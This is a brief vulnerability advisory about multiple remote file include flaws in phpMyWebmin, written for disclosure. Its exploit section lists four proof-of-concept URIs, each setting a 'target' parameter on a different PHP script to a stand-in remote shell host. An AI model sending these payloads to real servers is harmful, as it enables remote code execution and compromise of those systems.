phpMyWebmin Multiple Remote File Include Vulnerabilities

info
discussion
exploit
solution
references

phpMyWebmin Multiple Remote File Include Vulnerabilities

Attackers can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/change_preferences2.php?target=http://SH3LL?
http://www.example.com/create_file.php?target=http://SH3LL?
http://www.example.com/upload_local.php?target=http://SH3LL?
http://www.example.com/upload_multi.php?target=http://SH3LL?